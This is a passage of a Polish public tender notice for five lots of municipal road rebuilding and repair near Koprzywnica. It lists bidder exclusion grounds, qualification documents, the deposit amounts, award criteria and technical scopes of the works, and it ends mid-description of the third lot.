                III.3) WYKAZ OŚWIADCZEŃ SKŁADANYCH PRZEZ WYKONAWCĘ W CELU WSTĘPNEGO POTWIERDZENIA, ŻE NIE PODLEGA ON WYKLUCZENIU ORAZ SPEŁNIA WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ SPEŁNIA KRYTERIA SELEKCJI
              </b><br /><div style="padding-left: 20px"><b>
                  Oświadczenie o niepodleganiu wykluczeniu oraz spełnianiu warunków udziału w postępowaniu
                </b><br />
                  tak
                <br /><b>
                  Oświadczenie o spełnianiu kryteriów selekcji
                </b><br />
                  nie
                </div><b>
                III.4) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW , SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 3 USTAWY PZP:
              </b><br /><div style="padding-left: 20px">W celu wykazania braku podstaw do wykluczenia z postępowania o udzielenie zamówienia, o których mowa w art. 24 ust. 1 oraz ust. 5 pkt. 1 i 8 ustawy, wykonawca złoży oświadczenie o braku podstaw wykluczenia oraz przedłoży na potwierdzenie następujące dokumenty;
a)	art. 24 ust. 5 pkt 1 ustawy Zamawiający wykluczy z postępowania o udzielenie zamówienia publicznego wykonawcę, w stosunku do którego otwarto likwidację, 
w zatwierdzonym przez sąd układzie w postępowaniu restrukturyzacyjnym jest przewidziane zaspokojenie wierzycieli przez likwidację jego majątku lub sąd zarządził likwidację jego majątku w trybie art. 332 ust. 1 ustawy z dnia 15 maja 2015 r. - Prawo restrukturyzacyjne (t.j. Dz.U.2016 poz. 1574) lub którego upadłość ogłoszono, 
z wyjątkiem wykonawcy, który po ogłoszeniu upadłości zawarł układ zatwierdzony prawomocnym postanowieniem sądu, jeżeli układ nie przewiduje zaspokojenia wierzycieli przez likwidację majątku upadłego, chyba że sąd zarządził likwidację jego majątku w trybie art. 366 ust. 1 ustawy z dnia 28 lutego 2003 r. - Prawo upadłościowe (t.j. Dz.U.2015 r. poz. 233); - wymagany dokument; odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia na podstawie art. 24 ust. 5 pkt.1 ustawy;
b)	art. 24 ust. 5 pkt 8 ustawy Zamawiający wykluczy z postępowania o udzielenie zamówienia publicznego wykonawcę, który naruszył obowiązki dotyczące płatności  podatków - wymagany dokument; zaświadczenie właściwego urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków, wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania ofert lub inne dokumenty potwierdzające, że wykonawca zawarł porozumienie z właściwym organem w sprawie spłat tych należności wraz z ewentualnymi odsetkami lub grzywnami, w szczególności uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu;
c)	art. 24 ust. 5 pkt 8 ustawy Zamawiający wykluczy z postępowania o udzielenie zamówienia publicznego wykonawcę, który naruszył obowiązki dotyczące płatności  na ubezpieczenia społeczne lub zdrowotne - wymagany dokument n:  zaświadczenie Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego albo inny dokument potwierdzający, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia społeczne lub zdrowotne, wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania ofert lub inny dokument potwierdzający, że wykonawca zawarł porozumienie z właściwym organem w sprawie spłat tych należności wraz z ewentualnymi odsetkami lub grzywnami, w szczególności uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu. 
d)	Kolejnym wymaganym dokumentem na potwierdzenie wstępnej kwalifikacji o której mowa w pkt. b) jest; oświadczenie o niezaleganiu z opłacaniem podatków i opłat lokalnych, o których mowa w ustawie z dnia 12 stycznia 1991 r. o podatkach i opłatach lokalnych (Dz. U. z 2016 r. poz. 716).

9.4.5	Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej zamiast dokumentów, o których mowa powyżej w pkt. 9.4.4, składa odpowiednio, że:
a)	nie zalega z opłacaniem podatków, opłat, składek na ubezpieczenie społeczne lub zdrowotne albo że zawarł porozumienie z właściwym organem w sprawie spłat tych należności wraz z ewentualnymi odsetkami lub grzywnami, w szczególności uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu
b)	nie otwarto jego likwidacji ani nie ogłoszono upadłości,
c)	Dokumenty, o których mowa powyżej w pkt. a) powinny być wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania ofert, a w pkt. b) powinny być wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert.
d)	Jeżeli w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania lub miejsce zamieszkania ma osoba, której dokument dotyczy, nie wydaje się dokumentów, o których mowa w pkt. a) i b), zastępuje się je dokumentem zawierającym odpowiednio oświadczenie wykonawcy, ze wskazaniem osoby albo osób uprawnionych do jego reprezentacji, lub oświadczenie osoby, której dokument miał dotyczyć, złożone przed notariuszem lub przed organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego właściwym ze względu na siedzibę lub miejsce zamieszkania wykonawcy lub miejsce zamieszkania tej osoby. Przepis pkt. c) stosuje się odpowiednio.
</div><b>
                III.5) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 1 USTAWY PZP
              </b><br /><div style="padding-left: 20px"><b>III.5.1) W ZAKRESIE SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU:</b><br />9.4.2	 zdolności technicznej lub zawodowej;
a) wykonanych robót
Na potwierdzenie niniejszego warunku należy złożyć wykaz robót budowlanych wykonanych nie wcześniej niż w okresie ostatnich 5 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy  w tym okresie, wraz 
z podaniem ich rodzaju, wartości, daty, miejsca wykonania i podmiotów, na rzecz których roboty te zostały wykonane, z załączeniem dowodów określających czy te roboty budowlane zostały wykonane należycie, w szczególności informacji o tym czy roboty zostały wykonane zgodnie z przepisami prawa budowlanego i prawidłowo ukończone, przy czym dowodami, o których mowa, są referencje bądź inne dokumenty wystawione przez podmiot, na rzecz którego roboty budowlane były wykonywane, a jeżeli 
z uzasadnionej przyczyny o obiektywnym charakterze wykonawca nie jest w stanie uzyskać tych dokumentów  inne dokumenty; 
Zamawiający uzna warunek za spełniony, jeżeli Wykonawca wykaże, że w tym okresie wykonał:
Zadanie nr 1 
dwie roboty budowlane związane z budową lub przebudową lub rozbudową lub remontem drogi. Wymagana wartość wykonanych robót budowlanych wynosiła minimum 200 000,00 zł brutto każda.

Zadanie nr 2
dwie roboty budowlane związane z budową lub przebudową lub rozbudową lub remontem drogi. Wymagana wartość wykonanych robót budowlanych wynosiła minimum 250 000,00 zł brutto każda.

Zadanie nr 3 
dwie roboty budowlane związane z budową lub przebudową lub rozbudową lub remontem drogi. Wymagana wartość wykonanych robót budowlanych wynosiła minimum 250 000,00 zł brutto każda.

Zadanie nr 4
dwie roboty budowlane związane z budową lub przebudową lub rozbudową lub remontem drogi. Wymagana wartość wykonanych robót budowlanych wynosiła minimum 200 000,00 zł brutto każda.

Zadanie nr 5
dwie roboty budowlane związane z budową lub przebudową lub rozbudową lub remontem drogi. Wymagana wartość wykonanych robót budowlanych wynosiła minimum 150 000,00 zł brutto każda.

UWAGA!
W przypadku składania oferty na więcej niż jedno zadanie Wykonawca może wykazać się jedną robotą na zadania, na które składa ofertę, jeżeli sumaryczna wartość tej roboty odpowiada sumarycznej wartości opisanego warunku, np. dla zadania 1 i 2 sumaryczna wartość wykonanej usługi to minimum 450 000,00 zł.

Do każdej pozycji wykazu należy załączyć dowody określające, czy roboty te zostały wykonane w sposób należyty, w szczególności informacji o tym czy roboty zostały wykonane zgodnie z przepisami prawa budowlanego i prawidłowo ukończone.

b)    wykazu osób, które będą uczestniczyć w wykonywaniu zamówienia publicznego.
Na potwierdzenie niniejszego warunku należy złożyć wykaz osób, skierowanych przez wykonawcę do realizacji zamówienia publicznego, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz 
z informacjami na temat ich kwalifikacji zawodowych, uprawnień, doświadczenia 
i wykształcenia niezbędnych do wykonania zamówienia publicznego, a także zakresu wykonywanych przez nie czynności oraz informacją o podstawie do dysponowania tymi osobami;
Zamawiający uzna warunek za spełniony, jeżeli Wykonawca wykaże, że dysponuje n/w osobami:

Zadanie nr 1 
	       Kierownikiem budowy posiadającym uprawnienia budowlane do kierowania robotami w specjalności drogowej,

Zadanie nr 2 
	       Kierownikiem budowy posiadającym uprawnienia budowlane do kierowania robotami w specjalności drogowej,

Zadanie nr 3 
	       Kierownikiem budowy posiadającym uprawnienia budowlane do kierowania robotami w specjalności drogowej,

Zadanie nr 4 
	       Kierownikiem budowy posiadającym uprawnienia budowlane do kierowania robotami w specjalności drogowej,

Zadanie nr 5 
	       Kierownikiem budowy posiadającym uprawnienia budowlane do kierowania robotami w specjalności drogowej,

W przypadku składania oferty na więcej niż jedno zadanie Wykonawca może wykazać się tym samym kierownikiem budowy do wszystkich zadań. 

Do wykazu osób w stosunku do kierownika budowy należy dołączyć oświadczenie Wykonawcy, że zaproponowana osoba posiada wymagane uprawnienia i przynależy do właściwej izby samorządu zawodowego, jeżeli taki wymóg na te osoby nakłada Prawo budowlane.

Zgodnie z art. 12a Prawa budowlanego który to odsyła do ustawy z dnia 18 marca 2008 r.  o zasadach uznawania kwalifikacji zawodowych nabytych w państwach członkowskich Unii Europejskiej (Dz. U. z dnia 17 kwietnia 2008 r. ze zm.) przynależność do właściwej izby samorządu zawodowego nie jest wymagana od obywateli państw członkowskich Unii Europejskiej, Konfederacji Szwajcarskiej lub państw członkowskich Europejskiego Porozumienia o Wolnym Handlu (EFTA) gdyż do posiadania uprawnień w wykonywaniu samodzielnych funkcji w budownictwie nie jest wymagana przynależność do izby samorządu zawodowego.

9.4.3	sytuacji ekonomicznej lub finansowej.
Na potwierdzenie należy złożyć:

a)	informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej potwierdzającej
wysokość posiadanych środków finansowych lub zdolność kredytową wykonawcy, 
w okresie nie wcześniejszym niż 1 miesiąc przed upływem terminu składania ofert 
Wykonawca potwierdzi spełnienie warunku jeżeli wykaże że posiada nie mniej niż  Zadanie nr 1  100 000,00 PLN, Zadanie nr 2  100 000,00 PLN, Zadanie nr 3  100 000,00 PLN, Zadanie nr 4  100 000,00 PLN, Zadanie nr 5  100 000,00 PLN środków lub zdolność kredytową w tej samej wysokości.
W przypadku składania oferty na kilka zadań wartości te podlegają sumowaniu. 

b)	Dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia na sumę gwarancyjną określoną przez zamawiającego - to jest wykonywaniem robót budowlanych na kwotę nie mniejszą niż Zadanie nr 1  200 000,00 PLN, Zadanie nr 2  300 000,00 PLN, Zadanie nr 3  300 000,00 PLN, Zadanie nr 4  250 000,00 PLN, Zadanie nr 5  150 000,00 PLN.
W przypadku składania oferty na kilka zadań wartości te podlegają sumowaniu.
<br /><b>III.5.2) W ZAKRESIE KRYTERIÓW SELEKCJI:</b><br /></div><b>
                III.6) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 2 USTAWY PZP
              </b><br /><div style="padding-left: 20px"></div><b>
                III.7) INNE DOKUMENTY NIE WYMIENIONE W pkt III.3) - III.6)
              </b><div style="padding-left: 20px">W celu potwierdzenia braku podstaw do wykluczenia wykonawcy z postępowania, 
o których mowa w art. 24 ust. 1 pkt 23 ustawy, wykonawca w terminie 3 dni od dnia zamieszczenia na stronie internetowej której udostępniono SIWZ informacji o ofertach złożonych w postępowaniu zgodnie z art. 86 ust. 5 ustawy, składa stosownie do treści art. 24 ust. 11 ustawy, oświadczenie o przynależności lub braku przynależności do tej samej grupy kapitałowej oraz, w przypadku przynależności do tej samej grupy kapitałowej, dowody potwierdzające, że powiązania z innym wykonawcą nie prowadzą do zakłócenia konkurencji w postępowaniu
</div></div></div><div class="headerLarge_xforms" style="text-align: left"><u>
              SEKCJA IV: PROCEDURA
            </u></div><div style="padding-left: 20px;"><div style="text-align: left"><b>IV.1) OPIS </b><br /><b>IV.1.1) Tryb udzielenia zamówienia: </b>
                przetarg nieograniczony
              <br /><b>IV.1.2) Zamawiający żąda wniesienia wadium:</b><div style="padding-left: 20px">
                  tak,
                  <br />
                  Informacja na temat wadium
                  <br />Wadium w wysokości:
Dla Zadania nr 1  5 000,00 zł (słownie: pięć tysięcy złotych i 00/100 groszy) 
Dla Zadania nr 2  7 000,00 zł (słownie: siedem tysięcy złotych i 00/100 groszy)
Dla Zadania nr 3  7 000,00 zł (słownie: siedem tysięcy złotych i 00/100 groszy)
Dla Zadania nr 4  7 000,00 zł (słownie: siedem tysięcy złotych i 00/100 groszy)
Dla Zadania nr 5  4 000,00 zł (słownie: cztery tysiące złotych i 00/100 groszy)
- należy wnieść przed upływem terminu składania ofert
</div><br /><b>IV.1.3) Przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b><div style="padding-left: 20px">
                  nie
                </div><br /><b>
                IV.1.4) Wymaga się złożenia ofert w postaci katalogów elektronicznych lub dołączenia do ofert katalogów elektronicznych:
              </b><div style="padding-left: 20px">
                  nie
                <br />
                Dopuszcza się złożenie ofert w postaci katalogów elektronicznych lub dołączenia do ofert katalogów elektronicznych:
                <br />
                  nie
                <br />
                Informacje dodatkowe:
                <br /></div><br /><b>
                IV.1.5.) Wymaga się złożenia oferty wariantowej:
              </b><div style="padding-left: 20px">
                  nie
                <br />
                Dopuszcza się złożenie oferty wariantowej
                <br />
                  nie
                <br />
                Złożenie oferty wariantowej dopuszcza się tylko z jednoczesnym złożeniem oferty zasadniczej:
                <br />
                  nie
                </div><br /><b>
                IV.1.6) Przewidywana liczba wykonawców, którzy zostaną zaproszeni do udziału w postępowaniu
              </b><br /><i>
                (przetarg ograniczony, negocjacje z ogłoszeniem, dialog konkurencyjny, partnerstwo innowacyjne)
              </i><div style="padding-left: 20px">
                Liczba wykonawców  <br />
                Przewidywana minimalna liczba wykonawców  <br />
                Maksymalna liczba wykonawców  <br />
                Kryteria selekcji wykonawców:
                <br /></div><br /><b>
                IV.1.7) Informacje na temat umowy ramowej lub dynamicznego systemu zakupów:
              </b><div style="padding-left: 20px">
                Umowa ramowa będzie zawarta:
                <br /><br />
                Czy przewiduje się ograniczenie liczby uczestników umowy ramowej:
                <br />
                  nie
                <br />
                Informacje dodatkowe:
                <br /><br />
                Zamówienie obejmuje ustanowienie dynamicznego systemu zakupów:
                <br />
                  nie
                <br />
                Informacje dodatkowe:
                <br /><br />
                W ramach umowy ramowej/dynamicznego systemu zakupów dopuszcza się złożenie ofert w formie katalogów elektronicznych:
                <br />
                  nie
                <br />
                Przewiduje się pobranie ze złożonych katalogów elektronicznych informacji potrzebnych do sporządzenia ofert w ramach umowy ramowej/dynamicznego systemu zakupów:
                <br />
                  nie
                </div><br /><b>IV.1.8) Aukcja elektroniczna </b><br /><b>
                Przewidziane jest przeprowadzenie aukcji elektronicznej </b><i>(przetarg nieograniczony, przetarg ograniczony, negocjacje z ogłoszeniem) </i>
                nie
              <br /><b>Należy wskazać elementy, których wartości będą przedmiotem aukcji elektronicznej: </b><br /><b>Przewiduje się ograniczenia co do przedstawionych wartości, wynikające z opisu przedmiotu zamówienia:</b><br />
                nie
              <br />

              
                Należy podać, które informacje zostaną udostępnione wykonawcom w trakcie aukcji elektronicznej oraz jaki będzie  termin ich udostępnienia:
              
              <br />
              Informacje dotyczące przebiegu aukcji elektronicznej: 
              <br />
              Jaki jest przewidziany sposób postępowania w toku aukcji elektronicznej i jakie będą warunki, na jakich wykonawcy będą mogli licytować (minimalne wysokości postąpień): 
              <br />
              Informacje dotyczące wykorzystywanego sprzętu elektronicznego, rozwiązań i specyfikacji technicznych w zakresie połączeń:
              <br />
              Wymagania dotyczące rejestracji i identyfikacji wykonawców w aukcji elektronicznej: 
              <br />


              Informacje o liczbie etapów aukcji elektronicznej i czasie ich trwania: 
              <div style="padding-left: 20px">
                  Aukcja wieloetapowa
                  <table><tr><td>etap nr</td><td>czas trwania etapu</td></tr><tr><td></td><td></td></tr></table><br />
                Czy wykonawcy, którzy nie złożyli nowych postąpień, zostaną zakwalifikowani do następnego etapu:
                
                  nie
                <br />
                Warunki zamknięcia aukcji elektronicznej:
                <br /></div><br /><b>IV.2) KRYTERIA OCENY OFERT </b><br /><b>IV.2.1) Kryteria oceny ofert: </b><br /><b>IV.2.2) Kryteria</b><br /><div style="padding-left: 20px"><table><tr><td><i>Kryteria</i></td><td><i>Znaczenie</i></td></tr><tr><td>Cena brutto</td><td>60</td></tr><tr><td>Wydłużony okres udzielonej gwarancji jakości  </td><td>20</td></tr><tr><td>Zwiększenie grubości warstwy ścieralnej</td><td>20</td></tr></table></div><br /><b>IV.2.3) Zastosowanie procedury, o której mowa w art. 24aa ust. 1 ustawy Pzp </b>(przetarg nieograniczony)
              <br />
                tak
              <br /><b>IV.3) Negocjacje z ogłoszeniem, dialog konkurencyjny, partnerstwo innowacyjne </b><br /><b>IV.3.1) Informacje na temat negocjacji z ogłoszeniem</b><br />
              Minimalne wymagania, które muszą spełniać wszystkie oferty:
              <br /><br />
              Przewidziane jest zastrzeżenie prawa do udzielenia zamówienia na podstawie ofert wstępnych bez przeprowadzenia negocjacji
              
                nie
              <br />
              Przewidziany jest podział negocjacji na etapy w celu ograniczenia liczby ofert:
              
                nie
              <br />
              Należy podać informacje na temat etapów negocjacji (w tym liczbę etapów):
              <br /><br />
              Informacje dodatkowe
              <br /><br /><br /><b>IV.3.2) Informacje na temat dialogu konkurencyjnego</b><br />
              Opis potrzeb i wymagań zamawiającego lub informacja o sposobie uzyskania tego opisu:
              <br /><br />
              Informacja o wysokości nagród dla wykonawców, którzy podczas dialogu konkurencyjnego przedstawili rozwiązania stanowiące podstawę do składania ofert, jeżeli zamawiający przewiduje nagrody:
              <br /><br />
              Wstępny harmonogram postępowania:
              <br /><br />
              Podział dialogu na etapy w celu ograniczenia liczby rozwiązań:
              
                nie
              <br />
              Należy podać informacje na temat etapów dialogu:
              <br /><br /><br />
              Informacje dodatkowe:
              <br /><br /><b>IV.3.3) Informacje na temat partnerstwa innowacyjnego</b><br />
              Elementy opisu przedmiotu zamówienia definiujące minimalne wymagania, którym muszą odpowiadać wszystkie oferty:
              <br /><br />
              Podział negocjacji na etapy w celu ograniczeniu liczby ofert podlegających negocjacjom poprzez zastosowanie kryteriów oceny ofert wskazanych w specyfikacji istotnych warunków zamówienia:
              <br />
                nie
              <br />
              Informacje dodatkowe:
              <br /><br /><b>IV.4) Licytacja elektroniczna  </b><br />
              Adres strony internetowej, na której będzie prowadzona licytacja elektroniczna:
              <br /><div style="padding-left: 20px"></div>

              Adres strony internetowej, na której jest dostępny opis przedmiotu zamówienia w licytacji elektronicznej:
              <br /><div style="padding-left: 20px"></div>

              Wymagania dotyczące rejestracji i identyfikacji wykonawców w licytacji elektronicznej, w tym wymagania techniczne urządzeń informatycznych:
              <br /><div style="padding-left: 20px"></div>

              Sposób postępowania w toku licytacji elektronicznej, w tym określenie minimalnych wysokości postąpień:
              <br /><div style="padding-left: 20px"></div>

              Informacje o liczbie etapów licytacji elektronicznej i czasie ich trwania: 
              <div style="padding-left: 20px">
                  Licytacja wieloetapowa
                  <table><tr><td>etap nr</td><td>czas trwania etapu</td></tr><tr><td></td><td></td></tr></table><br />
                Wykonawcy, którzy nie złożyli nowych postąpień, zostaną  zakwalifikowani do następnego etapu:
                
                  nie
                </div>

              Termin otwarcia licytacji elektronicznej:
              <br /><div style="padding-left: 20px"></div>

              Termin i warunki zamknięcia licytacji elektronicznej:
              <br /><div style="padding-left: 20px"></div><br />
              Istotne dla stron postanowienia, które zostaną wprowadzone do treści zawieranej umowy w sprawie zamówienia publicznego, albo ogólne warunki umowy, albo wzór umowy:
              <br /><div style="padding-left: 20px"></div><br />
              Wymagania dotyczące zabezpieczenia należytego wykonania umowy: 
              <br /><div style="padding-left: 20px"></div><br />
              Informacje dodatkowe:
              <br /><div style="padding-left: 20px"></div><b>IV.5) ZMIANA UMOWY</b><br /><b>Przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy:</b>
                tak

                <br />
                Należy wskazać zakres, charakter zmian oraz warunki wprowadzenia zmian:
                <br />Zgodnie z zapisami określonymi w SIWZ<br /><b>IV.6) INFORMACJE ADMINISTRACYJNE </b><br /><br /><b>IV.6.1) Sposób udostępniania informacji o charakterze poufnym </b><i>(jeżeli dotyczy): </i><br /><br /><b>Środki służące ochronie informacji o charakterze poufnym</b><br /><br /><b>IV.6.2) Termin składania ofert lub wniosków o dopuszczenie do udziału w postępowaniu: </b><br />
              Data: 04/04/2017, godzina: 10:00,
              <br />
              Skrócenie terminu składania wniosków, ze względu na pilną potrzebę udzielenia zamówienia (przetarg nieograniczony, przetarg ograniczony, negocjacje z ogłoszeniem):
              <br />
                nie
              <br />
              Wskazać powody:
              <br /><br />
              Język lub języki, w jakich mogą być sporządzane oferty lub wnioski o dopuszczenie do udziału w postępowaniu
              <br />&gt;
              polski <br /><b>IV.6.3) Termin związania ofertą: </b>
                okres w dniach: 30 (od ostatecznego terminu składania ofert)
              <br /><b>IV.6.4) Przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia:</b>
                nie
              <br /><b>IV.6.5) Przewiduje się unieważnienie postępowania o udzielenie zamówienia, jeżeli środki służące sfinansowaniu zamówień na badania naukowe lub prace rozwojowe, które zamawiający zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia, nie zostały mu przyznane</b>
                nie
              <br /><b>IV.6.6) Informacje dodatkowe:</b><br /></div></div><div class="headerLarge_xforms" style="text-align: center"><u>
                ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH
              </u></div><div><b>Część nr: </b>1
                  
                <b>Nazwa: </b>Przebudowa drogi gminnej nr 334013T Postronna  wieś  od km 0+000 do km 0+515 i od km 0+900 do km 1+100<br /><div style="padding-left: 20px"><b>
                    1) Krótki opis przedmiotu zamówienia </b><i>(wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań)</i><b> a w przypadku partnerstwa innowacyjnego - określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:</b>Roboty związane z przebudową odcinka drogi gminnej Postronna  wieś polegają na wykonaniu: robót pomiarowych i rozbiórkowych, robotach ziemnych mechanicznych (wykopy), wykonaniu dolnej warstwy podbudowy grub. w-wy 20 cm z kruszywa naturalnego i górnej warstwy podbudowy z kruszywa łamanego grub. w-wy 20 cm  (w miejscach poszerzeń), wzmocnienia podłoża warstwą kruszywa łamanego średnia grub. w-wy 12 cm na odcinku od km 0+900 do km 1+100. 
Roboty nawierzchniowe bitumiczne polegają na:
- (odcinek I  od km 0+000 do km 0+515)  wykonaniu wzmocnienia nawierzchni poprzez ułożenie warstwy wyrównawczej z betonu asfaltowego AC11W w ilości średnio 50 kg/m2, geosiatki do zbrojenia nawierzchni, a następnie warstwy wiążącej z betonu asfaltowego AC11W grub. w-wy 4 cm oraz warstwy ścieralnej z betonu asfaltowego AC8S grub. w-wy 3 cm. 
Szerokość jezdni 3,50 m oraz poboczy bitumicznych 2x0,25 m o konstrukcji jak jezdnia.
- (odcinek II  od km 0+900 do km 1+100)  ułożenie warstwy wiążącej z betonu asfaltowego AC11W grub. w-wy 4 cm oraz warstwy ścieralnej z betonu asfaltowego AC8S grub. w-wy 3 cm. 
Roboty wykończeniowe polegają na utwardzeniu warstwą kruszywa łamanego stabilizowanego mechanicznie grub. 12 cm obustronnych poboczy szerokości po 50 cm na odc. 0+000 do 0+515 oraz szerokości po 0,75 cm na odc. od km 0+900 do km 1+100, a następnie utwardzeniu poboczy poprzez podwójne powierzchniowe utrwalenie grysami i emulsją asfaltową.
Bezpieczeństwo ruchu: należy ustawić znaki pionowe (D-6 + T-27) oraz oznakować przejście dla pieszych farbami chlorokauczukowymi przejście dla pieszych. Dodatkowo na odcinku od km 0+000 do km 0+515 należy oddzielić pobocza bitumiczne od poboczny utwardzonych kruszywem linią przerywaną krawędziową znak P-7c.
<br /><b>2) Wspólny Słownik Zamówień (CPV): </b>45233120-6, 45113000-2<br /><b>3) Wartość części zamówienia (jeżeli zamawiający podaje informacje o wartości zamówienia):</b><br />
                  Wartość bez VAT:
                  <br />
                  Waluta:
                  <br /><div style="padding-left: 20px"><br /><b>4) Czas trwania lub termin wykonania: </b>
                      data zakończenia: 14/07/2017<br /><b>5) Kryteria oceny ofert: </b><table style="padding-left: 20px"><tr><td><i>Kryteria</i></td><td><i>Znaczenie</i></td></tr><tr><td>Cena brutto</td><td>60</td></tr><tr><td>Wydłużony okres udzielonej gwarancji jakości  </td><td>20</td></tr><tr><td>Zwiększenie grubości warstwy ścieralnej</td><td>20</td></tr></table><b>
                      6) INFORMACJE DODATKOWE:
                    </b><br /></div></div><br /></div><div><b>Część nr: </b>2
                  
                <b>Nazwa: </b>Remont drogi gminnej dz. nr 3800 obręb Koprzywnica, Koprzywnica (Budka)  Sośniczany od km 0+000 do km 0+950<br /><div style="padding-left: 20px"><b>
                    1) Krótki opis przedmiotu zamówienia </b><i>(wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań)</i><b> a w przypadku partnerstwa innowacyjnego - określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:</b>Przedmiotem zadania jest wykonanie robót budowlanych polegających na remoncie odcinka drogi gminnej Dz. Nr 3800 obręb Koprzywnica, (Koprzywnica (Budka)  Sośniczany od km 0+000 do km 0+950.
Wykonanie robót ziemnych mechanicznych tj. koryta na głębokość średnio 30 cm celem zachowania istniejącej niwelety drogi oraz miejscową korektę nachylenia skarp wąwozu. Następnie przy użyciu równiarki samojezdnej i walca wibracyjnego  wykonać mechaniczne profilowanie i zagęszczenie istniejącego podłoża. Podbudowa pomocnicza (warstwa dolna) z kruszywa naturalnego o grubości 20 cm należy wykonać z rumoszu skalnego lub pospółki. Podbudowa zasadnicza  (warstwa górna) 
z kruszywa łamanego o uziarnieniu 0/63 mm, grub. w-wy 20 cm.
Na całości remontowanego odcinka  zostanie ułożona  warstwa wiążąca z betonu asfaltowego AC11W dla ruchu KR1 grub. warstwy 4 cm (w ilości średnio 100 kg/m2), a następnie warstwa ścieralna 
z betonu asfaltowego AC8S dla ruchu KR1 grubości 3 cm.
Pobocza uzupełnić kruszywem łamanym stabilizowanym mechanicznie warstwą grubości średnio 10 cm, a następnie podwójnie powierzchniowo utrwalić przy użyciu emulsji asfaltowej kationowej 
i grysów kamiennych
<br /><b>2) Wspólny Słownik Zamówień (CPV): </b>45233120-6, 45113000-2<br /><b>3) Wartość części zamówienia (jeżeli zamawiający podaje informacje o wartości zamówienia):</b><br />
                  Wartość bez VAT:
                  <br />
                  Waluta:
                  <br /><div style="padding-left: 20px"><br /><b>4) Czas trwania lub termin wykonania: </b>
                      data zakończenia: 14/07/2017<br /><b>5) Kryteria oceny ofert: </b><table style="padding-left: 20px"><tr><td><i>Kryteria</i></td><td><i>Znaczenie</i></td></tr><tr><td>Cena brutto</td><td>60</td></tr><tr><td>Wydłużony okres udzielonej gwarancji jakości  </td><td>20</td></tr><tr><td>Zwiększenie grubości warstwy ścieralnej</td><td>20</td></tr></table><b>
                      6) INFORMACJE DODATKOWE:
                    </b><br /></div></div><br /></div><div><b>Część nr: </b>3
                  
                <b>Nazwa: </b>Remont drogi gminnej dz. nr 202/1 obręb Dmosice, Dmosice  droga krajowa nr 9  od km 0+200 do km 1+225<br /><div style="padding-left: 20px"><b>
                    1) Krótki opis przedmiotu zamówienia </b><i>(wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań)</i><b> a w przypadku partnerstwa innowacyjnego - określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:</b>Niniejsze zadanie obejmuje wykonanie remontu drogi na odcinku długości 1025 mb. Na odcinku od km 0+200 do km 1+225 droga o nawierzchni z kruszywa kamiennego, o dużym nachyleniu niwelety co powoduje, że podczas nawalnego deszczu nawierzchnia drogi jest niszczona i rozmywana.
Istniejącą drogę należy na odcinku, będącym przedmiotem niniejszego zamówienia wzmocnić do  wymaganych parametrów technicznych. 
Należy usunąć z powierzchni poboczy istniejącą warstwę humusu przy użyciu koparki podsiębiernej.
